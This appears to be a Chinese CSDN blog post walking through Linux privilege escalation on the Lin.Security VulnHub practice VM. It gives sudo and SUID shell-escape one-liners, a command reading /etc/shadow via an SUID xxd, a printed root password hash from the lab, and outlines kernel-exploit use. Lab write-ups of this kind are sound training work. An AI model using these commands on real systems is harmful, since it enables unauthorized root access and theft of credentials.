linux提权

最新推荐文章于 2024-06-12 10:23:54 发布
最新推荐文章于 2024-06-12 10:23:54 发布
阅读量287 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/132739508
版权

目录

一、linux提权靶场下载与安装

二、基础提权 

 1.sudo提权

 2.suid提权

3.taskset执行bash 

三、内核提权 

相关网站

https://gtfobins.github.io/#+sudo

https://blog.csdn.net/weixin_43873557/article/details/113784146

一、linux提权靶场下载与安装

#下载链接
https://www.vulnhub.com/entry/linsecurity-1,244/

用户名密码:bob/secret

#安装与配置
1.修改默认键盘布局[默认不是美式键盘]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符号是shift+2]

vim /etc/default/keyboard
[讲XKBLAYOUT改的值为us]

setupcon

2.配置网卡[Ubuntu 18通过netplan设置网络]
vim /etc/netplan/50-cloud-init.yaml
[将enp0s3改为ens33]

netplan apply

二、基础提权 

 1.sudo提权

sudo权限是root把本来只能超级用户执行的命令赋予普通用户执行

1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bash

sudo -i

 2.suid提权

suid简介:SUID这个是uid +s的组合,s指的是特殊权限。一般情况下,用户的权限是3位,比如0755这样的,特殊权限默认没有配置,但是如果超级管理员希望用户在执行一些特殊权限文件时,拥有root的权限,就会配置特殊权限

使用find命令快速查找所有suid文件

find / -user root -perm -4000 -print 2>/dev/null

xxd访问/etc/shadow

-rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

 itservices组具有执行权限,通过/etc/group发现susan用户属于itservices用户组,利用4.隐藏文件发现的密码登录susan用户,进行提权

cd home/susan

susan@linsecurity:/home/bob$ xxd "/etc/shadow" |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

3.taskset执行bash 

taskset 是一个用于将进程绑定到特定的CPU核心上的命令

taskset 1 /bin/bash -p

三、内核提权 

将linux内核提权速查脚本移到Linux系统中

查询该文件

 

进行解压缩 

 

进入解压后的文件,并执行里面的后缀为.sh的文件

 成功后就可以查看推荐的漏洞

 将推荐的漏洞下载到本地,复制到Linux系统中,进行解压缩

进入解压后的文件

 存在makefile,进行编译make

 查看编译后的文件,发现新增,进行执行该文件

 运行文件,不能成功,则换其他漏洞

 

Serein_NSQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
升-linux手法总结
01-14
升-linux手法总结
Linux手法总结以及 Linuxexp集合
02-22
Linux常见总结包括(内核漏洞、suid、定时任务、sudo等等)
Linux——SUDO
negnegil的博客
09-03 7721
使用SudoLinux账户限 在Linux/Unix中,/etc/sudoers文件是sudo限的配置文件,其中储存了一些用户或组可以以root限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo限,请输出vim /etc/sudoers打开文件进行编辑,找到root限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root
pkexec本地(CVE-2021-4034)ubuntu18
千寻的博客
05-17 3000
Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围限的组件。它为非特进程与特进程通信供了一种有组织的方式。也可以使用 polkit 执行具有限的命令,使用命令 pkexec 后跟要执行的命令(具有 root 限)。polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。
Linux常用方法 (゚益゚メ) 渗透测试
寻觅的博客
03-30 3120
文章目录简介常用命令汇总Linux环境变量简述 简介 进行linux前最好对Linux信息收集、渗透测试常用命令有所了解。 常用命令汇总 这里简单在一下常用命令 命令 作用 uname -a 查看系统所有信息 ifconfig -a 查看所有网络信息 ps aux或ps -elf 查看进程信息 id 或 who 或 w 或 last 查看用户信息 crontab -l 查看当前用户的计划任务 Linux环境变量简述 ...
【渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种方式练习
serendipity1130的博客
09-06 1440
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。 首先,您可以使用以下凭据登录主机:bob / secret 下载地址:https://in.security/downloads/lin.security_v1.0.ova 环境配置: 1.因为直接开机的security靶机NAT连接,无法
Linux
m0_57856283的博客
03-12 1万+
将这个虚拟文件导入虚拟机 开机默认没密码 账号:Bob 密码:secret root账号密码secret123 进去之后是这样的 我们先查看他的ip地址 这里我们看到他是没有IP地址的 我们先切换到root账户 进来之后需要改一个配置文件 然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机,注意,我们用普通用户远程过去 ssh bob@192.168.179.138 我们可以看到他已经远程了过来 过来之后我们可以先·看看他是什...
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
LinuxNote
05-28
Linux
Linux扫描脚本
04-28
Linux扫描脚本
优化命令taskset详解
m0_58292366的博客
06-13 5036
引言:我的Linode十分繁忙,在跑一些密集操作数据库的Rake任务时尤其如此。但我观察发现,Linode服务器的4核CPU,只有第1个核心(CPU#0)非常忙,其他都处于idle状态。不了解Linux是如何调度的,但目前显然有优化的余地。除了处理正常任务,CPU#0还需要处理每秒网卡中断。因此,若能将CPU#0分担的任务摊派到其他CPU核心上,可以预见,系统的处理能力将有更大的升。两个名词SMP (Symmetrical Multi-Processing):指在一个计算机上汇集了一组处理器(多CPU),
红队笔记之Suid浅析与利用方法总结
明光札记
12-22 4114
suid原理介绍,以及具体方法总结
taskset命令详解
热门推荐
weixin_56270746的博客
06-14 1万+
目录一、taskset介绍二、命令格式 三、什么是绑核四、如何绑核五、掩码形式绑核六、列表形式 七、命令的使用指定八、总结Taskset是一个可以将某进程任务指定到某个CPU上运行 通过 taskset 命令可将某个进程与某个CPU核心绑定,使得其仅在与之绑定的CPU核心上运行SMP (Symmetrical Multi-Processing):指在一个计算机上汇集了一组处理器(多CPU),各CPU之间共享内存子系统以及总线结构。 CPU affinity:中文唤作“CPU亲和力”,是指在CMP架构下,能够
Linux大全
yggcwhat
05-14 9416
Linux大全
taskset: 让进程运行在指定的CPU
weixin_34289744的博客
03-05 73
两个名词SMP (Symmetrical Multi-Processing)指在一个计算机上汇集了一组处理器(多CPU)各CPU之间共享内存子系统以及总线结构。CPU affinity中文唤作“CPU亲和力”是指在CMP架构下能够将一个或多个进程绑定到一个或多个处理器上运行。一、在Linux上修改进程的“CPU亲和力”在Linux上可以通过 taskset 命令进行修改。以U...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
最新发布
appearappear的博客
06-12 272
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1191
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 342
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 774
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
Linuxtga
01-30
Linuxtga是指通过利用tga文件中的漏洞来获取root限。tga文件是一种图像文件格式,而在某些情况下,tga文件中的解析器可能存在漏洞,攻击者可以利用这些漏洞来执行恶意代码并限。 具体的步骤如下: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值